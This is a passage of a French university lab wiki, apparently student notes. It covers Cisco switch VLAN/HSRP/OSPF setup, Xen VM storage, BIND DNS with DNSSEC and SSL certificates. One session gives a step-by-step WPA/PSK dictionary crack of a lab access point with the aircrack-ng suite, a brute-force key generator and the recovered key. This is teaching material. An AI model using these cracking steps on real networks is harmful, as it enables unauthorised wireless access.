 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
===Mise en place des partitions pour la VM===&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
===Mise en place serveur DNS===&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.pw &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
===Certificat SSL===&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Installation de DNSSEC===&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
==Séance 3.5 : 14/12/2018==&lt;br /&gt;
&lt;br /&gt;
===Craquage WPA/PSK par dictionnaire===&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
====Récupération du handshake====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
====Rappel montage USB====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
====Crack WPA/PSK====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
==Séance 4 : 17/12/2018==&lt;br /&gt;
===Correction IPV6 routeur===&lt;br /&gt;
&lt;br /&gt;
==== Vlan 43 - XEN ====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== Vlan 131 - Interconnexion ====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== Vlan 10+N - Groupe N ====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== Vérifications du fonctionnement ====&lt;br /&gt;
&lt;br /&gt;
===== show running-config =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
